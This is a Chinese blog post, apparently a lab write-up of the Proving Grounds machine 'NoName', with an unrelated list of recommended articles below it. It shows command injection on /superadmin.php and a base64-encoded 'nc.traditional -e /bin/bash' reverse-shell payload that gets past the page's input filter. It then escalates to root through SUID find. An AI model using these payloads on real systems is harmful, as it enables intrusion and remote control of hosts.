PG::NoName

最新推荐文章于 2024-05-30 09:02:27 发布
最新推荐文章于 2024-05-30 09:02:27 发布
阅读量178 收藏
点赞数
分类专栏: PROVING GROUNDS 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46743202/article/details/128644143
版权

nmap -Pn -p- -T4 --min-rate=1000 192.168.135.15
image.png
nmap -Pn -p 80 -sCV 192.168.135.15
image.png
查看80端口的页面,尝试命令执行等,未发现可利用的地方
image.png
对路径进行爆破
image.png
在/superadmin.php路径下,发现了同样的页面,这里执行 ping 127.0.0.1 | id
成功执行命令
image.png
查看一下superadmin.php的源码,可以看到能使用等都被进行了过滤,需要尝试进行绕过
image.png
这里可以参考一下 nc.traditional
https://www.commandlinux.com/man-page/man1/nc.traditional.1.html
对 nc.traditional -e /bin/bash 192.168.49.135 4444 进行base64编码
ping 127.0.0.1 | echo "bmMudHJhZGl0aW9uYWwgLWUgL2Jpbi9iYXNoIDE5Mi4xNjguNDkuMTM1IDQ0NDQ=" | base64 -d
image.png
利用SUID的find提权
https://gtfobins.github.io/gtfobins/find/#suid
image.png
image.png

aya3t
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Ruby报错rake aborted! PG::ConnectionBad: could not connect to server: No such file or directory
lxq_9532的博客
07-17 1478
执行bundle exec rake evm:start报错 [root@localhost manageiq]# bundle exec rake evm:start ** Using session_store: ActionDispatch::Session::MemCacheStore ** ManageIQ master, codename: Ivanchuk Starting EVM....
解决 navicat 连接报错:FATAL:no pg_hba.conf entry
知音
04-09 3702
问题 Navicat 工具连接服务器上的 PostgreSQL 数据库时报错 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-8lfpzLKg-1617935873905)(C:\Users\zhiyin\Desktop\no pg_hba.conf entry.png)] 解决 通过修改 PostgreSQL 的配置文件来允许远程连接 修改 data/pg_hba.conf 文件 linux 下搜索 pg_hba.conf 文件所在路径 # 在 /var 目录下查找文件 fi
更新JAR到maven仓库 gpg: keyserver send failed: No name
懒得出风头的博客
09-08 1528
更新JAR到maven仓库 如果没有上传过参考:发布项目到Maven中央仓库的最佳实践 问题主要在上传公匙错误: gpg: keyserver send failed: No name C:\Users\Administrator>gpg --keyserver hkp://pool.sks-keyservers.net:11371 --send-keys 47772D3763C2165F gpg: sending key 47772D3763C2165F to hkp://pool.sks-keys
pg_dump 不能用 出现pg_dump: No matching tables were found,pg_dump: schema with OID 1515227 does not exi
weixin_44767249的博客
06-28 1032
使用sql查询 创建函数,直接复制即可 CREATE OR REPLACE FUNCTION public.show_create_table( in_schema_name varchar, in_table_name varchar ) RETURNS text LANGUAGE plpgsql VOLATILE AS $$ DECLARE -- the ddl we're building v_table_ddl text; -- data about the t
PostgreSQL新手上路PG::ConnectionBad (FATAL: Peer authentication failed
shiralwz的专栏
08-25 1736
PostgreSQL新手上路PG::ConnectionBad (FATAL: Peer authentication failed
[2022-03-16]posgresql连接提示psql: error: FATAL: no pg_hba.conf
m15217321304的博客
03-16 2390
新安装的数据库连接时提示如下错误: [postgres@postgres data]$ psql -h 192.168.40.160 -p5432 -d postgres psql: error: FATAL: no pg_hba.conf entry for host "192.168.40.160", user "postgres", database "postgres", SSL off [postgres@postgres data]$ 出现该错误的原因是没有在pg_hba.conf 里
PostgreSQL 连接问题 FATAL: no pg_hba.conf entry for host
热门推荐
m0_71272694的博客
09-08 1万+
pg_hba.conf修改后,使用pg_ctl reload重新读取pg_hba.conf文件,如果pg_ctl找不到数据库,则用-D /.../pgsql/data/ 指定数据库目录,或export PGDATA=/.../pgsql/data/ 导入环境变量。要解决这个问题,只需要在PostgreSQL数据库的安装目录下找到/data/pg_hba.conf,找到“# IPv4 local connections:”md5是密码验证方法,可以改为trust。在其下加上请求连接的机器IP。
【error】pg_dump no matching tables were found
自由 平等~忠诚 奉献
10-18 6916
pg_dump 备份数据时,提示 no matching tables were found, 可是表明明是存在的。最后发现,是引号的问题,于是加了双引号,可还是不行。最终在Stack Overflow发现了答案。https://stackoverflow.com/questions/13905162/postgres-dump-specific-table-with-a-capital-lett
PostgreSQL 备份恢复:pg_probackup
分享既学习
09-04 927
pg_probackup 是一款功能强大的开源 PostgreSQL 备份工具,和 MySQL 社区 XtraBackup 类似,功能也非常强大,本篇文章将和各位共同探索学习。环境介绍:CentOS Linux release 7.8.2003 (Core)数据库版本:PostgreSQL - 12.2使用可以看到该工具主要分为几块功能,本小节会详细介绍。
企业级PG:EnterpriseDB的安装使用
高云平的博客
12-03 4298
文章目录概述下载安装将安装包上传执行run安装文件配置环境新建用户edb配置环境变量启动edb数据库启动数据库查看数据库是否正常 概述 EnterpriseDB是全球唯一一家提供基于PostgreSQL企业级产品与服务的厂商 EnterpriseDB是PostgreSQL的一个分支,在PostgreSQL基础上,针对企业级应用进行了专门的优化,同时,增加了一系列如动态 性能调优(DynaTune)...
express-sequelize-postgress:表达均衡后退
04-01
-save sequelize npm install --save pg pg-hstore sequelize init sequelize model:create --name users --attributes email:string,password:string sequelize model:create --name User --attributes "email:
graphql-rails-api:带有GraphQL的Rails API变得简单
05-20
GraphqlRailsApi graphql-rails-api是一个gem,它提供了生成器,可以以域驱动的设计方式轻松地描述您的graphql API。... 要禁用PostgreSQL uuid扩展,请添加选项--no-pg-uuid 要禁用ActionCable Webs
苹果8XPC和手机二合一完整版
02-03
iframe src="{maccms:path}index.php?m=user-iframe.html" frameborder="0" scrolling="no" width="100%" height="25"></iframe> 特有标签: {maccms:userid} 会员ID {maccms:username} 会员名 {maccms:...
ap6212a0_a33_sc3817r_神舟验证版本_借用nvram_ap6210这个配置文件_20170626_1834没有外层目录.7z
06-26
<string-array translatable="false" name="config_tether_bluetooth_regexs"> <item>"bt-pan" 3、 R:\wyb\ap6212a0_a33_sc3817r\android\device\softwinner\astar-y3\astar_y3.mk # ap6181/6210/6330 sdio ...
!!!!ap6212a0_a33_sc3817r_验证通过_修正wifi的配置文件为nvram_ap6212.txt
07-03
<string-array translatable="false" name="config_tether_bluetooth_regexs"> <item>"bt-pan" 3、 Q:\a33\ap6212a0_a33_sc3817r\android\device\softwinner\astar-y3\astar_y3.mk # ap6181/6210/6330 sdio ...
登录安全分析报告:小米官网注册
Explinks的博客
05-29 964
图形验证及交互验证方式的安全性到底如何?请看具体分析。
导线防碰撞警示灯:高压线路安全保障
最新发布
dxzhkj888888的博客
05-30 299
同时,警示灯的反光材料也起到了至关重要的作用,无论是白天还是夜晚,都能将光线反射到最远的距离,让警示效果倍增。导线防碰撞警示灯也叫高压线太阳能警示灯、户外高压线路夜间红色闪光灯,以其独特的设计和卓越的性能,成为了电力安全领域的保障。在广袤的大地上,高压线路如同血脉般纵横交错,然而,在这看似平静的电力输送背后,却隐藏着不容忽视的安全隐患。而到了夜晚,警示灯便开始了它的使命。导线防碰撞警示灯的出现,使得那些驾驶超高车辆、操作超高施工机械的司机们,也在警示灯的提醒下,更加谨慎地行驶和操作,避免了可能发生的危险。
网络学习(九)|深入解析Cookie与Session:高级应用及安全实践
weixin_44435110的博客
05-28 693
通过本以上,后端开发人员可以深入了解Cookie和Session的高级应用、常见问题及其解决方案,有助于设计和实现高效、安全的会话管理系统。
内网安全-隧道搭建&穿透上线&内网穿透-nps自定义上线&内网渗透-Linux上线-cs上线Linux主机
rumil的博客
05-28 1546
nps内网穿透工具是一款轻量级、高性能、功能强大的内网代理服务器。支持tcp、udp、socks5、http等几乎所有流量转发,可用于访问内网网站、支付本地接口调试、ssh访问、远程桌面,内网dns解析、内网socks5代理等等……,并带有功能强大的web管理端。一个轻量级、高性能、强大的内网穿透代理服务器,带有强大的web管理端。 内网渗透-CS上线Linux主机-Linux上线
Postgresql命令:CREATE EXTENSION pinyin;报错:/share/extension/pinyin.control": No such file or directory
06-08
这个错误提示似乎是由于在执行 CREATE EXTENSION pinyin 命令时,PostgreSQL无法找到pinyin扩展的控制文件。这个问题可能是由于你没有安装pinyin扩展所致。 你可以按照以下步骤进行排查和解决: 1. 确认你已经安装了pinyin扩展。可以通过运行以下命令来查看: ``` SELECT name, default_version, installed_version FROM pg_available_extensions WHERE name LIKE '%pinyin%'; ``` 如果该扩展不存在,则需要安装它。 2. 如果pinyin扩展已经安装,但是仍然出现该错误,请检查PostgreSQL的扩展目录是否包含pinyin控制文件。可以通过运行以下命令来查看扩展目录的位置: ``` SHOW shared_preload_libraries; ``` 该命令将显示PostgreSQL的扩展目录位置。检查该目录下是否存在pinyin控制文件,如果不存在,可以尝试重新安装该扩展或手动将控制文件添加到该目录中。 3. 如果以上步骤都无法解决问题,请提供更多详细的错误信息和上下文,以便更好地帮助你解决问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值